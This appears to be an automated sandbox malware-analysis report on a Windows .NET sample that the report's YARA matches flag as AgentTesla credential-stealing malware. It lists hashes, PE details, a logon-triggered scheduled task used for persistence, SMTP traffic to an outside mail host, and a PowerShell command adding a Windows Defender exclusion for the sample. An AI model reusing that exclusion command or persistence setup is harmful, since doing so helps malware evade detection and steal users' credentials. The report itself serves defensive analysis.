                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                                            Process:C:\Users\user\AppData\Roaming\lnYkIr.exe
                                                            File Type:XML 1.0 document, ASCII text
                                                            Category:dropped
                                                            Size (bytes):1579
                                                            Entropy (8bit):5.097049290187453
                                                            Encrypted:false
                                                            SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtFNxvn:cgergYrFdOFzOzN33ODOiDdKrsuTFTv
                                                            MD5:BFAAB82E2AEDC6DB97894A2168E57B86
                                                            SHA1:60F6EB20D6147FF9C17ED46E179DF6369FA78A27
                                                            SHA-256:4104608D4B81BC1B11F4C6E54FB103D0DDAA86F302AE1184FC2F3F3BAE2D60A5
                                                            SHA-512:133B6963A33ECFCE3ABDE4E1DEBFAFC99FF5CF1B8BF8230C4D190DED47C3FC7D5227E848E371F9501CE4EA540E0D21C22B8E70FC305C60987AA83D61D4CABEE7
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):743424
                                                            Entropy (8bit):7.7638612229070745
                                                            Encrypted:false
                                                            SSDEEP:12288:xB3ZyDQWn9D5M/ANhqLcAofNy+Vr1QP7/rJFaOG9MjuLeBaVkI6omZu:xB3Z4QU9JqqVxQZ4j9Mjy0aVCRZu
                                                            MD5:2D291BAEDB79EE55DAA67417103F0905
                                                            SHA1:810F2F9576976B3E68A610FBE2797B148C82766C
                                                            SHA-256:0DF39B8C26A1B395B2389908F7DC4781AABBA0AA10F4642BAF46B8F1A9E2C426
                                                            SHA-512:3E5883A3232E43797744D377712FE77B5CBC750D83F983C33A2FA190FA9347DE812D01153BA7E380E60F0E9CF853974D3906891A138B59D43822673B46370203
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 29%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.e..............0................. ........@.. ....................................@.....................................O.......T...........................L...T............................................ ............... ..H............text........ ...................... ..`.rsrc...T...........................@..@.reloc...............V..............@..B........................H........A...3..........du...............................................0..K........( ....(.....{......=...%.r...p.%.(!....%.rW..p.%.(!....%.r...p.("...o#...*"..($...*"..($...*z.,..{....,..{....o......(%...*.0..S........s&...}.....s'...}.....s'...}.....((....{.....o)....{.....8..s*...o+....{......ds,...o-....{....r...po.....{.... ......s,...o/....{.....o0....{....r...po#....{.....o1....{.... .....Es*...o+....{....rl..po.....{.....K..s,...o/....{.....o0....{....r...po#....{..
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:false
                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.7638612229070745
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Windows Screen Saver (13104/52) 0.07%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            File name:SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
                                                            File size:743'424 bytes
                                                            MD5:2d291baedb79ee55daa67417103f0905
                                                            SHA1:810f2f9576976b3e68a610fbe2797b148c82766c
                                                            SHA256:0df39b8c26a1b395b2389908f7dc4781aabba0aa10f4642baf46b8f1a9e2c426
                                                            SHA512:3e5883a3232e43797744d377712fe77b5cbc750d83f983c33a2fa190fa9347de812d01153ba7e380e60f0e9cf853974d3906891a138b59d43822673b46370203
                                                            SSDEEP:12288:xB3ZyDQWn9D5M/ANhqLcAofNy+Vr1QP7/rJFaOG9MjuLeBaVkI6omZu:xB3Z4QU9JqqVxQZ4j9Mjy0aVCRZu
                                                            TLSH:ECF4560220284EBECFD10FFAD41F1D520161FD3A9463B56B79437A9866B32CEC1DA5AD
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.e..............0.................. ........@.. ....................................@................................
                                                            Icon Hash:338d96b2b3924e2d
                                                            Entrypoint:0x4aa3da
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x65CA36A7 [Mon Feb 12 15:17:59 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            inc esi
                                                            cmp byte ptr [ecx+35h], al
                                                            inc esp
                                                            xor eax, 34383535h
                                                            push edx
                                                            cmp byte ptr [esp+esi], dh
                                                            cmp byte ptr [esi+35h], al
                                                            inc edi
                                                            inc ebp
                                                            xor dh, byte ptr [00000034h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xaa3860x4f.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xac0000xcf54.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xa914c0x54.text
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000xa83f80xa84004631faea4ec3b812206fead246190f8bFalse0.909496018294948data7.900652138585597IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rsrc0xac0000xcf540xd0007fb574703e63cc9363917a7aac8e574bFalse0.06935471754807693data3.729136473170915IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0xba0000xc0x200c31a4c67487e70f7fd0214418c12d7f4False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_ICON0xac1000xbff8Device independent bitmap graphic, 128 x 186 x 32, image size 47616, resolution 2834 x 2834 px/m0.04181588800260459
                                                            RT_GROUP_ICON0xb81080x14data1.15
                                                            RT_VERSION0xb812c0x2e8data0.4435483870967742
                                                            RT_MANIFEST0xb84240xb2bXML 1.0 document, Unicode text, UTF-8 (with BOM) text0.3704092339979014
                                                            DLLImport
                                                            mscoree.dll_CorExeMain
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Feb 12, 2024 20:39:11.523232937 CET4972880192.168.2.5208.95.112.1
                                                            Feb 12, 2024 20:39:11.639709949 CET8049728208.95.112.1192.168.2.5
                                                            Feb 12, 2024 20:39:11.640081882 CET4972880192.168.2.5208.95.112.1
                                                            Feb 12, 2024 20:39:11.646333933 CET4972880192.168.2.5208.95.112.1
                                                            Feb 12, 2024 20:39:11.763645887 CET8049728208.95.112.1192.168.2.5
                                                            Feb 12, 2024 20:39:11.811657906 CET4972880192.168.2.5208.95.112.1
                                                            Feb 12, 2024 20:39:12.634736061 CET49729587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:12.785979986 CET58749729208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:12.786217928 CET49729587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:15.293914080 CET4973280192.168.2.5208.95.112.1
                                                            Feb 12, 2024 20:39:15.411195040 CET8049732208.95.112.1192.168.2.5
                                                            Feb 12, 2024 20:39:15.411359072 CET4973280192.168.2.5208.95.112.1
                                                            Feb 12, 2024 20:39:15.411724091 CET4973280192.168.2.5208.95.112.1
                                                            Feb 12, 2024 20:39:15.501027107 CET58749729208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:15.501266003 CET49729587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:15.529270887 CET8049732208.95.112.1192.168.2.5
                                                            Feb 12, 2024 20:39:15.608537912 CET4973280192.168.2.5208.95.112.1
                                                            Feb 12, 2024 20:39:15.652216911 CET58749729208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:15.652388096 CET58749729208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:15.652601957 CET49729587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:15.803988934 CET58749729208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:15.812763929 CET49729587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:15.964152098 CET58749729208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:15.964207888 CET58749729208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:15.964292049 CET49729587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:15.964320898 CET58749729208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:15.964360952 CET58749729208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:15.964409113 CET49729587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:16.115633965 CET58749729208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:16.172827005 CET49729587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:16.317367077 CET49735587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:16.324548960 CET58749729208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:16.350382090 CET49729587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:16.468524933 CET58749735208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:16.468611956 CET49735587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:16.501565933 CET58749729208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:16.502795935 CET49729587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:16.656523943 CET58749729208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:16.656881094 CET49729587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:16.814771891 CET58749729208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:16.815133095 CET49729587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:16.969650030 CET58749729208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:16.970750093 CET49729587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:17.146693945 CET58749729208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:17.147015095 CET49729587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:17.300123930 CET58749729208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:17.300786018 CET49729587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:17.300869942 CET49729587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:17.300906897 CET49729587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:17.300945044 CET49729587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:17.453418016 CET58749729208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:17.453463078 CET58749729208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:17.582454920 CET58749729208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:17.626324892 CET58749735208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:17.626918077 CET49735587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:17.717891932 CET49729587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:17.778352022 CET58749735208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:17.778377056 CET58749735208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:17.778584957 CET49735587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:17.929697990 CET58749735208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:17.934920073 CET49735587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:18.088067055 CET58749735208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:18.088097095 CET58749735208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:18.088116884 CET58749735208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:18.088136911 CET58749735208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:18.088160992 CET49735587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:18.088231087 CET49735587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:18.239687920 CET58749735208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:18.241957903 CET49735587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:18.394340038 CET58749735208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:18.421770096 CET49735587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:18.573385000 CET58749735208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:18.573959112 CET49735587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:18.727788925 CET58749735208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:18.728287935 CET49735587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:18.885345936 CET58749735208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:18.885689020 CET49735587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:19.038610935 CET58749735208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:19.039010048 CET49735587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:19.215333939 CET58749735208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:19.215611935 CET49735587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:19.367778063 CET58749735208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:19.368727922 CET49735587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:19.368864059 CET49735587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:19.368901014 CET49735587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:19.368948936 CET49735587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:39:19.519959927 CET58749735208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:19.520780087 CET58749735208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:19.644428015 CET58749735208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:39:19.686647892 CET49735587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:40:02.515002012 CET4972880192.168.2.5208.95.112.1
                                                            Feb 12, 2024 20:40:02.630494118 CET8049728208.95.112.1192.168.2.5
                                                            Feb 12, 2024 20:40:02.630595922 CET4972880192.168.2.5208.95.112.1
                                                            Feb 12, 2024 20:40:06.339560032 CET4973280192.168.2.5208.95.112.1
                                                            Feb 12, 2024 20:40:06.456722021 CET8049732208.95.112.1192.168.2.5
                                                            Feb 12, 2024 20:40:06.456792116 CET4973280192.168.2.5208.95.112.1
                                                            Feb 12, 2024 20:40:52.530632973 CET49729587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:40:52.682005882 CET58749729208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:40:52.682586908 CET58749729208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:40:52.682684898 CET49729587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:40:52.688355923 CET49729587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:40:56.343368053 CET49735587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:40:56.495598078 CET58749735208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:40:56.496155024 CET58749735208.91.198.143192.168.2.5
                                                            Feb 12, 2024 20:40:56.496226072 CET49735587192.168.2.5208.91.198.143
                                                            Feb 12, 2024 20:40:56.501081944 CET49735587192.168.2.5208.91.198.143
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Feb 12, 2024 20:39:11.373461008 CET5790153192.168.2.51.1.1.1
                                                            Feb 12, 2024 20:39:11.492419004 CET53579011.1.1.1192.168.2.5
                                                            Feb 12, 2024 20:39:12.509649992 CET5533453192.168.2.51.1.1.1
                                                            Feb 12, 2024 20:39:12.630139112 CET53553341.1.1.1192.168.2.5
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Feb 12, 2024 20:39:11.373461008 CET192.168.2.51.1.1.10x2964Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                            Feb 12, 2024 20:39:12.509649992 CET192.168.2.51.1.1.10x1ab7Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Feb 12, 2024 20:39:02.813265085 CET1.1.1.1192.168.2.50x3b70No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                            Feb 12, 2024 20:39:02.813265085 CET1.1.1.1192.168.2.50x3b70No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                            Feb 12, 2024 20:39:11.492419004 CET1.1.1.1192.168.2.50x2964No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                            Feb 12, 2024 20:39:12.630139112 CET1.1.1.1192.168.2.50x1ab7No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                            Feb 12, 2024 20:39:12.630139112 CET1.1.1.1192.168.2.50x1ab7No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                            Feb 12, 2024 20:39:12.630139112 CET1.1.1.1192.168.2.50x1ab7No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                            Feb 12, 2024 20:39:12.630139112 CET1.1.1.1192.168.2.50x1ab7No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                            • ip-api.com
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.549728208.95.112.1807276C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
                                                            TimestampBytes transferredDirectionData
                                                            Feb 12, 2024 20:39:11.646333933 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                            Host: ip-api.com
                                                            Connection: Keep-Alive
                                                            Feb 12, 2024 20:39:11.763645887 CET174INHTTP/1.1 200 OK
                                                            Date: Mon, 12 Feb 2024 19:39:11 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Content-Length: 5
                                                            Access-Control-Allow-Origin: *
                                                            X-Ttl: 60
                                                            X-Rl: 44
                                                            Data Raw: 74 72 75 65 0a
                                                            Data Ascii: true


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.549732208.95.112.1807708C:\Users\user\AppData\Roaming\lnYkIr.exe
                                                            TimestampBytes transferredDirectionData
                                                            Feb 12, 2024 20:39:15.411724091 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                            Host: ip-api.com
                                                            Connection: Keep-Alive
                                                            Feb 12, 2024 20:39:15.529270887 CET174INHTTP/1.1 200 OK
                                                            Date: Mon, 12 Feb 2024 19:39:15 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Content-Length: 5
                                                            Access-Control-Allow-Origin: *
                                                            X-Ttl: 60
                                                            X-Rl: 44
                                                            Data Raw: 74 72 75 65 0a
                                                            Data Ascii: true


                                                            TimestampSource PortDest PortSource IPDest IPCommands
                                                            Feb 12, 2024 20:39:15.501027107 CET58749729208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                            Feb 12, 2024 20:39:15.501266003 CET49729587192.168.2.5208.91.198.143EHLO 141700
                                                            Feb 12, 2024 20:39:15.652388096 CET58749729208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                            250-PIPELINING
                                                            250-SIZE 41648128
                                                            250-VRFY
                                                            250-ETRN
                                                            250-STARTTLS
                                                            250-AUTH PLAIN LOGIN
                                                            250-AUTH=PLAIN LOGIN
                                                            250-ENHANCEDSTATUSCODES
                                                            250-8BITMIME
                                                            250-DSN
                                                            250 CHUNKING
                                                            Feb 12, 2024 20:39:15.652601957 CET49729587192.168.2.5208.91.198.143STARTTLS
                                                            Feb 12, 2024 20:39:15.803988934 CET58749729208.91.198.143192.168.2.5220 2.0.0 Ready to start TLS
                                                            Feb 12, 2024 20:39:17.626324892 CET58749735208.91.198.143192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                            Feb 12, 2024 20:39:17.626918077 CET49735587192.168.2.5208.91.198.143EHLO 141700
                                                            Feb 12, 2024 20:39:17.778377056 CET58749735208.91.198.143192.168.2.5250-us2.outbound.mailhostbox.com
                                                            250-PIPELINING
                                                            250-SIZE 41648128
                                                            250-VRFY
                                                            250-ETRN
                                                            250-STARTTLS
                                                            250-AUTH PLAIN LOGIN
                                                            250-AUTH=PLAIN LOGIN
                                                            250-ENHANCEDSTATUSCODES
                                                            250-8BITMIME
                                                            250-DSN
                                                            250 CHUNKING
                                                            Feb 12, 2024 20:39:17.778584957 CET49735587192.168.2.5208.91.198.143STARTTLS
                                                            Feb 12, 2024 20:39:17.929697990 CET58749735208.91.198.143192.168.2.5220 2.0.0 Ready to start TLS

                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:20:39:07
                                                            Start date:12/02/2024
                                                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
                                                            Imagebase:0x8e0000
                                                            File size:743'424 bytes
                                                            MD5 hash:2D291BAEDB79EE55DAA67417103F0905
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2146302322.000000000400E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2146302322.000000000400E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:20:39:08
                                                            Start date:12/02/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe
                                                            Imagebase:0xeb0000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
